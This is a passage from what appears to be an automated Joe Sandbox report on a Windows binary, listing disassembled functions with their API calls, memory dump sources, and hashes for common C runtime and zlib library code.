                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5C45
                                                                                        • Part of subcall function 00007FF7F3DF5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DF55AC
                                                                                        • Part of subcall function 00007FF7F3DEA948: RtlFreeHeap.NTDLL(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA95E
                                                                                        • Part of subcall function 00007FF7F3DEA948: GetLastError.KERNEL32(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA968
                                                                                        • Part of subcall function 00007FF7F3DEA900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7F3DEA8DF,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEA909
                                                                                        • Part of subcall function 00007FF7F3DEA900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7F3DEA8DF,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEA92E
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5C34
                                                                                        • Part of subcall function 00007FF7F3DF55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DF560C
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5EAA
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5EBB
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5ECC
                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7F3DF610C), ref: 00007FF7F3DF5EF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                      • String ID:
                                                                                      • API String ID: 4070488512-0
                                                                                      • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                      • Instruction ID: ce22389b0d4238fabec1117b19ec90c686226e4584af794b52388409d4679bd6
                                                                                      • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                      • Instruction Fuzzy Hash: C4D1D322A0824646E7A4BF71D8801B9E752EF94794FC48135EA3E6F7D9DF3CE44187A0
                                                                                      Function 00007FF7F3DEA614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 1239891234-0
                                                                                      • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                      • Instruction ID: d277a1c71338f8291452321b88f62b3e03fdd158b2b04791860cff91d12c42ab
                                                                                      • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                      • Instruction Fuzzy Hash: 21319432608F8285DBA4DF74E8802AEB7A4FB85758F900135EAAD57B99DF3CC145CB50
                                                                                      Function 00007FF7F3DF1874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 2227656907-0
                                                                                      • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                      • Instruction ID: 9d6aa7df9ac7cfe7ce49a40c7a8e33845df1d62af64414c4ce23ecc254a164ac
                                                                                      • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                      • Instruction Fuzzy Hash: 36B1C762B1869241EBA5ABB195401B9E354FB45BE4FC44231ED7D2FBC9DF3CE4418390
                                                                                      Function 00007FF7F3DF5E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5EAA
                                                                                        • Part of subcall function 00007FF7F3DF55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DF560C
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5EBB
                                                                                        • Part of subcall function 00007FF7F3DF5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DF55AC
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5ECC
                                                                                        • Part of subcall function 00007FF7F3DF55C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DF55DC
                                                                                        • Part of subcall function 00007FF7F3DEA948: RtlFreeHeap.NTDLL(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA95E
                                                                                        • Part of subcall function 00007FF7F3DEA948: GetLastError.KERNEL32(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA968
                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7F3DF610C), ref: 00007FF7F3DF5EF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                      • String ID:
                                                                                      • API String ID: 3458911817-0
                                                                                      • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                      • Instruction ID: 5a6dba40920c9645f2ea863ef8199061851d97349b4016abef8d2f7b12cae3e4
                                                                                      • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                      • Instruction Fuzzy Hash: 1A518022A0864246E790FF71D8C11A9E761BF58794FC44135EA7E6B7D9DF3CE44087A0
                                                                                      Function 00007FF7F3DDD010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID:
                                                                                      • API String ID: 2933794660-0
                                                                                      • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                      • Instruction ID: 8f1adda0f54d874580e69400943d2f0805d526555979edf3dc9f5d6e720c79c3
                                                                                      • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                      • Instruction Fuzzy Hash: FD118F22B14F0589EB409B70E8442B873A0FB48718F440E31DE7D5A7A4DF38D1548390
                                                                                      Function 00007FF7F3DF3C10 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy_s
                                                                                      • String ID:
                                                                                      • API String ID: 1502251526-0
                                                                                      • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                      • Instruction ID: 02afd5c82c8c365ad6604708941f99c5fe5b09a083af3dc0674c507c30ee4473
                                                                                      • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                      • Instruction Fuzzy Hash: 27C12C72B1828587D764DF65E084669F7A1FB84788F858134DB6E5B7C8DB3DE801CB80
                                                                                      Function 00007FF7F3DDA47B Relevance: 4.1, Strings: 3, Instructions: 397COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $header crc mismatch$unknown header flags set
                                                                                      • API String ID: 0-1127688429
                                                                                      • Opcode ID: e32b299fc273864699ec3bddfbf8fc958dab4a7742ffdf8f0166f3b43fcc42d1
                                                                                      • Instruction ID: 1ef53597ee346b96bfca5b5287e48f462a2686bccbb7526e4e55ddec3af06736
                                                                                      • Opcode Fuzzy Hash: e32b299fc273864699ec3bddfbf8fc958dab4a7742ffdf8f0166f3b43fcc42d1
                                                                                      • Instruction Fuzzy Hash: F0F1A672A147D58BE7E9AF54C088B3ABAA9EF44744F468138DE5D2B3D0CB38D541C790
                                                                                      Function 00007FF7F3DF9728 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise_clrfp
                                                                                      • String ID:
                                                                                      • API String ID: 15204871-0
                                                                                      • Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                      • Instruction ID: 97f2b2aa30890fb174f5f9057559e6e4c03ee0c959cdf2483f91ba3f0d32cc21
                                                                                      • Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                      • Instruction Fuzzy Hash: D5B16B73A04B89CAEB55CF29C8863687BA0F744B4CF198931DA6D877A8CB39D451C750
                                                                                      Function 00007FF7F3DE39A4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $
                                                                                      • API String ID: 0-227171996
                                                                                      • Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                      • Instruction ID: 119c4383384ceab78ce588ad8f55242fff4ad3ab0a2f563b67a4e13e16b1a95c
                                                                                      • Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                      • Instruction Fuzzy Hash: 18E1C972A0864681D7ACAF95C05013DBB60FF44B48F944335DA2E2B7D4DF29E8D1C792
                                                                                      Function 00007FF7F3DDA2DB Relevance: 2.7, Strings: 2, Instructions: 218COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: incorrect header check$invalid window size
                                                                                      • API String ID: 0-900081337
                                                                                      • Opcode ID: e8ec78490181e4ccec650f854842bb3e08bcfae3bf2db5596c2af0d8e2ff5899
                                                                                      • Instruction ID: 909e5711ae91f7e7bb87fb40fc8419465e895f5c02befe174f1fbee281e6d8b5
                                                                                      • Opcode Fuzzy Hash: e8ec78490181e4ccec650f854842bb3e08bcfae3bf2db5596c2af0d8e2ff5899
                                                                                      • Instruction Fuzzy Hash: 7391DBB2A182C587E7E49F54C448B3E7AADFF44354F418139DA5A5A7C0CB3CE940CB90
                                                                                      Function 00007FF7F3DEDEF0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: e+000$gfff
                                                                                      • API String ID: 0-3030954782
                                                                                      • Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                      • Instruction ID: d09b78aa94845c18feb48d9aa9067321da86747a164519f118f2e6a888e38c1b
                                                                                      • Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                      • Instruction Fuzzy Hash: 6F515662B182C186E7A9DE759810769AF91E744B94F888331CBBC4FBC5CE7DD4808762
                                                                                      Function 00007FF7F3DEDA5C Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: gfffffff
                                                                                      • API String ID: 0-1523873471
                                                                                      • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                      • Instruction ID: 72c41dc383aa084c2445dd37dfb8b456688385d1accf9e97987e75410dbe7ad7
                                                                                      • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                      • Instruction Fuzzy Hash: 3FA19822B087CA8AEB69DF65A0007A9BB90EB54BC4F408231DE6D5B7C5DE3DD441C362
                                                                                      Function 00007FF7F3DE8794 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID: TMP
                                                                                      • API String ID: 3215553584-3125297090
                                                                                      • Opcode ID: 55bfb0711aaa24fc3f3c49a17a094aed8874a1becd77c64581317e125ecb5b45
                                                                                      • Instruction ID: fef1e7e29bfeab74891baf1a7509f2bc6dab31087e0e94af3d60ed6b58e7d0de
                                                                                      • Opcode Fuzzy Hash: 55bfb0711aaa24fc3f3c49a17a094aed8874a1becd77c64581317e125ecb5b45
                                                                                      • Instruction Fuzzy Hash: 0C51AF41F0864341FBACB6A6695117ADA906F44FD4FC84234DE3E6F7D6EE3CE48142A2
                                                                                      Function 00007FF7F3DF3480 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapProcess
                                                                                      • String ID:
                                                                                      • API String ID: 54951025-0
                                                                                      • Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                      • Instruction ID: 0bdb1d588c16533388a992f0c83006ada29d3a2ba2fe3e31b932aefb5a8fdd37
                                                                                      • Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                      • Instruction Fuzzy Hash: D4B09220E07A02C2EB883B616CC2218A2A47F68710FD80178C46D68370DE2C21E597A0
                                                                                      Function 00007FF7F3DE35A0 Relevance: .3, Instructions: 327COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                      • Instruction ID: 84db886a7d81b801591252f4578ee71e944f7c56f360401b32549a26f55bc591
                                                                                      • Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                      • Instruction Fuzzy Hash: F9D1EB72A0864245EBECAE65844023DBBA0EF45B48F940339CD2D2B7D5CF3DD885D7A2
                                                                                      Function 00007FF7F3DD9800 Relevance: .3, Instructions: 287COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
